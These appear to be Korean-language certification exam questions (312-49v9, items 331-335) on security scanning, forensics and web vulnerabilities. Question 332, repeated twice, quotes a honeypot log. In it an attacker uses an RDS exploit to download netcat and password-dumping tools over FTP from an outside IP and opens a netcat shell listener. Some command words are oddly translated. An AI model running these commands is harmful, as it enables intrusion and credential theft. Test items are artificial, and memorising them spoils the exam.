312-49v9 문제 331
George는 Hammond and Sons LLC의 보안 분석을 수행하고 있습니다. 그는 무선 네트워크의 보안 취약점을 테스트하고 있습니다. 그는 스캔하는 동안 가능한 한 "은밀하게" 남을 계획입니다. 이 상황에서 Nessus와 같은 스캐너가 권장되지 않는 이유는 무엇입니까?
312-49v9 문제 332
다음은 lab.wiretrip.net에서 호스팅된 허니팟 로그에서 발췌한 것입니다. Snort는 213.116.251.162에서 유니코드 공격을 보고했습니다. File Permission Canonicalization 취약점(UNICODE 공격)은 일반적으로 스크립트를 실행할 수 있는 권한이 없는 임의의 폴더에서 스크립트를 실행할 수 있도록 합니다. 공격자는 유니코드 공격을 시도하고 결국 boot.ini 표시에 성공합니다.
그런 다음 msadcs.dll을 통해 RDS를 사용하는 것으로 전환합니다. RDS 취약점으로 인해 악의적인 사용자는 IIS 서버에서 셸 명령(예: CMD.EXE)을 실행할 SQL 문을 구성할 수 있습니다. 그는 빠른 쿼리를 수행하여 디렉터리가 존재하는지 발견하고 msadcs.dll에 대한 쿼리는 디렉터리가 올바르게 작동하고 있음을 보여줍니다. 공격자는 아래와 같이 명령이 실행되는 RDS 쿼리를 만듭니다.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c 에코 johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c 에코 종료 >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
주어진 익스플로잇에서 무엇을 추론할 수 있습니까?
그런 다음 msadcs.dll을 통해 RDS를 사용하는 것으로 전환합니다. RDS 취약점으로 인해 악의적인 사용자는 IIS 서버에서 셸 명령(예: CMD.EXE)을 실행할 SQL 문을 구성할 수 있습니다. 그는 빠른 쿼리를 수행하여 디렉터리가 존재하는지 발견하고 msadcs.dll에 대한 쿼리는 디렉터리가 올바르게 작동하고 있음을 보여줍니다. 공격자는 아래와 같이 명령이 실행되는 RDS 쿼리를 만듭니다.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c 에코 johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c 에코 종료 >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
주어진 익스플로잇에서 무엇을 추론할 수 있습니까?
312-49v9 문제 333
공격자는 노출된 계정, 세션 ID, 로그아웃, 비밀번호 관리, 타임아웃, 기억나기 등의 인증 또는 세션 관리 기능에 취약점을 사용합니다. 사용자를 사칭하기 위한 비밀 질문, 계정 업데이트 등, 공용 컴퓨터를 통해 접속한 사이트에서 사용자가 로그아웃하지 않고 단순히 브라우저를 닫는 경우 공격자는 나중에 동일한 브라우저를 사용하여 사용자의 권한을 악용할 수 있습니다. 다음 중 위에서 언급한 취약점/악용은 무엇입니까?
312-49v9 문제 334
파일 삭제 프로세스와 관련하여 다음 설명 중 맞는 것은?
312-49v9 문제 335
조사자는 다음 스크린샷에 표시된 명령을 실행하여 무엇을 보려고 합니까?
